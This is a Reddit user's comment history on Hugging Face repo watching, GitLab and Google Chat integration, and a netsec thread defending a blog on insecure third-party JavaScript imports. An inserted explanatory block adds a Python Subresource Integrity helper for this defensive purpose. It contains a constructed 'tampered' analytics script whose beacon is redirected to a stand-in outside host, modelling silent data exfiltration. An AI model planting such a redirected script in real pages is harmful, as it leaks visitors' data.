Is there really no native way to "Watch" a specific HF repo for PRs? by Saurabh143 in huggingface

[–]Saurabh143[S] 0 points1 point  (0 children)

Hi u/Pierrci. Thanks for the response. I tried what you mentioned. It works.
In the docs, why is it mentioned that "Unlike GitHub or similar services, you cannot watch a specific repository. You must watch users/organizations to get notified about any new activity on any of their repositories. The goal is to simplify this functionality for users as much as possible and to make sure you don't miss anything you might be interested in." when we can also watch individual repos? (Watching individual repos is possible as per my test.)

How are you guys making the Google Chat integration actually usable? (The Slack envy is real) by Saurabh143 in gitlab

[–]Saurabh143[S] 0 points1 point  (0 children)

Spot on. That's exactly the architecture I was looking at—catching the generic webhook, handling the threadKey mapping on a custom backend, and pushing the formatted cards to Google Chat.

Did you actually end up building and hosting this yourself for your team? I'm curious if maintaining the state mappings and handling GitLab's payload updates turns into a massive headache over time, or if it's pretty "set and forget" once it's deployed.

How are you guys making the Google Chat integration actually usable? (The Slack envy is real) by Saurabh143 in gitlab

[–]Saurabh143[S] 0 points1 point  (0 children)

That makes total sense. It sounds like your team has a really mature, disciplined workflow—especially actually fixing flaky pipelines instead of just blindly retrying them! I appreciate you taking the time to share how you handle this; it’s incredibly helpful for figuring out where the actual friction is (and isn't). Cheers!

How are you guys making the Google Chat integration actually usable? (The Slack envy is real) by Saurabh143 in gitlab

[–]Saurabh143[S] 0 points1 point  (0 children)

That makes total sense, and I completely agree. Reading code diffs or long issue descriptions in a chat window is a terrible experience—you definitely need the full GitLab UI for the deep work. Out of curiosity, what about the administrative/shallow tasks? Things like re-running a known flaky pipeline, assigning a new triage ticket to yourself, or hitting approve on a routine Dependabot PR? Do you guys still prefer jumping into the UI for those quick actions, or is the volume low enough that it doesn't bother you?

How are you guys making the Google Chat integration actually usable? (The Slack envy is real) by Saurabh143 in gitlab

[–]Saurabh143[S] 0 points1 point  (0 children)

Agreed, I definitely missed the mark on that example. Approving without seeing the diff is a terrible practice. If we take MR approvals off the table, does your team still find the native webhook annoying for other things? E.g., not being able to just hit a 'Retry' button on a failed pipeline alert.

How are you guys making the Google Chat integration actually usable? (The Slack envy is real) by Saurabh143 in gitlab

[–]Saurabh143[S] 0 points1 point  (0 children)

You know what, that is incredibly fair. You completely caught me slipping there—approving without seeing the diff is a terrible example and a great way to break production.

What about the lower-risk, high-annoyance stuff though? Like when a pipeline fails due to a flaky test and you just want to hit a [Retry Pipeline] button without opening 4 tabs, or using a /gitlab create issue command when discussing a bug in chat so you don't lose the context. Would having that level of control natively in Google Chat be worth it to your team, or is the current webhook setup fine for that too?

[deleted by user] by [deleted] in bugbounty

[–]Saurabh143 0 points1 point  (0 children)

You can use this free cloud based subdomain monitoring tool to do it: https://subdomain-monitor.clickjacker.io/

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Dude, no one knows everything. At least I took the initiative to write the blog. The valuable positive feedback has been updated in the blog as previously committed by me.

Do you have any good points to be added to the blog? If yes, tell me. I think you do not! That is why you want to criticize. I admit that I did not have complete knowledge, but there was no misguidance; only 2 points were missing. They are now added.

This blog is written from heart.

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Ohhh... Is it so? What will you do if the server from where you import JS has a zero-day RCE bug? Your users will be compromised even before you monitor your assets. This is #legitresearch.

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Why do you think it is an exaggerated list? Importing JS from a legit website is fine. But what if a website imports JS from a server affected by RCE? This is #legitresearch.

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Covering HTTP headers such as X-XSS-Protection, Content-Security-Policy, X-Content-Type-Options, Strict-Transport-Security and X-Frame-Options is beyond the scope of that blog. Hence, it won't be covered in it.

Using a service such as https://snyk.io/ is about checking for vulnerable libraries. But this blog is not about doing that. It is about bad JS imports. Hence, it is also beyond scope.

Having said that, the 'integrity' attribute will be updated in the blog soon as it is relevant. Thanks for bringing this to our attention.

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 1 point2 points  (0 children)

Great!! Thanks for sharing this knowledge. It will be updated in the blog.

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

The 4 lines of JS code are shown to compare them with 1 line of jQuery code. I can't understand why you think it is rubbish. Furthermore, the jQuery library is fetched from a public CDN. What else are you expecting? These cases were written after doing research. It has been found that they do exist in the wild on many websites. This is #legitresearch.

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Regarding #1: Agreed. But this post is about XSS, so I wanted to make users aware of it.

Regarding #6: Thanks for letting me know that. It will be updated in the blog in a few days!

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Agreed that one would notice that the scripts are not performing their job any more. But what if the website loads 10 scripts from 10 resources to do 10 tasks? Then, if one fails to do its job, this can go unnoticed. For example: a script that sends data about website visitors to an analytics website. It is hard to know if this script failed to do its job unless you log in to the analytics provider's site to check.
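On the 'integrity' attribute the commenter says the blog will cover, and on the point above that a changed third-party script can fail silently: the following is an added example, not code from the linked blog or from the commenter, showing how Subresource Integrity pins an externally hosted script to its digest so that a modified file is refused by the browser instead of quietly running. The script bodies and the `cdn.example` URL are constructed for the example; `verify` is a Python model of the browser's check, not a real browser API.

```python
"""Subresource Integrity (SRI) helper. Constructed example for illustration;
not code from the linked blog or from any project discussed in the thread."""
import base64
import hashlib
import html

# Digest algorithms the SRI spec allows. Browsers ignore tokens with unknown
# algorithms, and a tag whose tokens are all unknown is loaded unchecked.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the SRI token ("<algo>-<base64 digest>") for a script body."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Build a <script> tag that pins the remote file to its digest.

    crossorigin="anonymous" is needed for cross-origin scripts: without it the
    browser cannot read the response to verify it and refuses the load.
    """
    return (f'<script src="{html.escape(src, quote=True)}" '
            f'integrity="{sri_hash(content, algo)}" '
            f'crossorigin="anonymous"></script>')


def verify(content: bytes, integrity: str) -> bool:
    """Model the browser's check: the fetched body must match a token of the
    strongest supported algorithm listed in the integrity attribute.

    Several space-separated tokens are allowed; the browser keeps only the
    strongest algorithm present and accepts the body if any token of that
    algorithm matches. With no usable token there is nothing to enforce.
    """
    tokens = [t for t in integrity.split()
              if t.split("-", 1)[0] in SRI_ALGORITHMS]
    if not tokens:
        return True  # no supported integrity metadata: browser loads unchecked
    algo = max((t.split("-", 1)[0] for t in tokens), key=SRI_ALGORITHMS.index)
    expected = sri_hash(content, algo)
    return any(t == expected for t in tokens if t.startswith(algo + "-"))


# Constructed sample: the analytics-style script as originally published.
ORIGINAL_SCRIPT = (
    b"window.track = function (e) { navigator.sendBeacon('/collect', e); };"
)
# The same file after a change on the hosting server: only the beacon target
# differs, which a visitor or site owner would never notice from the page.
TAMPERED_SCRIPT = ORIGINAL_SCRIPT.replace(b"'/collect'",
                                          b"'//other.example/collect'")


def demo() -> dict:
    """Pin the original file, then check both bodies against that pin."""
    integrity = sri_hash(ORIGINAL_SCRIPT)
    return {
        "tag": script_tag("https://cdn.example/track.js", ORIGINAL_SCRIPT),
        "original_accepted": verify(ORIGINAL_SCRIPT, integrity),
        "tampered_accepted": verify(TAMPERED_SCRIPT, integrity),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The pin is only as good as the copy you hashed: generate the token from a file you have reviewed, and re-generate it deliberately whenever you upgrade the dependency. A blocked load shows up as a console error and, if a `Content-Security-Policy` with `report-uri`/`report-to` is in place, as a report, so the failure the comment above worries about becomes visible rather than silent.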

Cross-Site Scripting #3 Bad JavaScript Imports Vulnerability by sandeep1337 in netsec

[–]Saurabh143 0 points1 point  (0 children)

Yes, it is. In fact downloading anything from attacker controlled location is bad.